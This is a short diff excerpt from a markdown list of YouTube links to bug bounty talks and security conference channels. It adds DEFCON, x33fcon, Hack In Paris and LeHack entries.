- [Nahamsec](https://www.youtube.com/c/Nahamsec)
|
||||
@ -26,4 +25,7 @@
|
||||
- [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
|
||||
- [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
|
||||
- [The Conscience of a Hacker](https://www.youtube.com/watch?v=0tEnnvZbYek)
|
||||
- [Defcon 2020 Talks](https://www.youtube.com/user/DEFCONConference/videos)
|
||||
- [Defcon Conference](https://www.youtube.com/user/DEFCONConference/videos)
|
||||
- [x33fcon Conference](https://www.youtube.com/c/x33fcon)
|
||||
- [Hack In Paris](https://www.youtube.com/user/hackinparis)
|
||||
- [LeHack / HZV](https://www.youtube.com/user/hzvprod)
|